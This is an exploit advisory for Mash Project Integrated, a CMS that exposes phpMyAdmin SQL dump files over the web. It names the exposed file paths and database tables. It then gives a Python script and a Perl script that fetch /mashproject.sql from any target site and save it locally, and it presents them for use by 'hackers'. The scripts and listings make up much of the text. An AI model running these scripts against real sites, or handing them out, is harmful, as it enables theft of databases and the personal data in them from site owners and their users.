########################################################################### # Exploit Title : Mash Project Integrated 4.2.7.1 Database Disclosure Exploit # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 02/04/2019 # Vendor Homepage : mashglobal.org # Software Download Link : github.com/Shekharrajak/Mash-Project-Integrated/archive/master.zip # Software Information Link : github.com/Shekharrajak/Mash-Project-Integrated github.com/mashproject/mashproject.github.io # Software Version : 3 and 4.2.7.1 / and other versions # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-538 [ File and Directory Information Exposure ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Acunetix Information Link about => phpMyAdmin SQL dump Web Vulnerability acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/ ########################################################################### # Description about Software : *************************** Mash Project - Building a Global Community of Social Change Makers CMS. ########################################################################### # Impact : *********** * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server). The dump typically contains SQL statements to create the table, populate it, or both. This file contains an phpMyAdmin SQL dump. This information is highly sensitive and should not be found on a production system. ########################################################################### File : ***** /mashproject (1).sql /mashproject (2).sql /mashproject.sql Information : ************ -- phpMyAdmin SQL Dump -- version 4.2.7.1 -- phpmyadmin.net -- -- Host: 127.0.0.1 -- Server version: 5.6.20 -- PHP Version: 5.5.15 -- Database: `mashproject` -- Table structure for table `contributors` -- Table structure for table `event` -- Table structure for table `press` -- Table structure for table `project` -- Table structure for table `team` ########################################################################### # Database Disclosure Information Exposure Exploit 1 : *********************************************** #!/usr/bin/python import string import re from urllib2 import Request, urlopen disc = "/mashproject.sql" url = raw_input ("URL: ") req = Request(url+disc) rta = urlopen(req) print "Result" html = rta.read() rdo = str(re.findall("resources.*=*", html)) print rdo exit ########################################################################### # Database Disclosure Information Exposure Exploit 2 : *********************************************** #!/usr/bin/perl -w # Author : KingSkrupellos # Team : Cyberizm Digital Security Army use LWP::Simple; use LWP::UserAgent; system('cls'); system('Mash Project Integrated 4.2.7.1 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="mashproject.sql"; my $url = "http://" . $TargetIP . $path . $File; print "\n Wait Please Dear Hacker!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/mashproject.sql"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/mashproject.sql\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } ########################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###########################################################################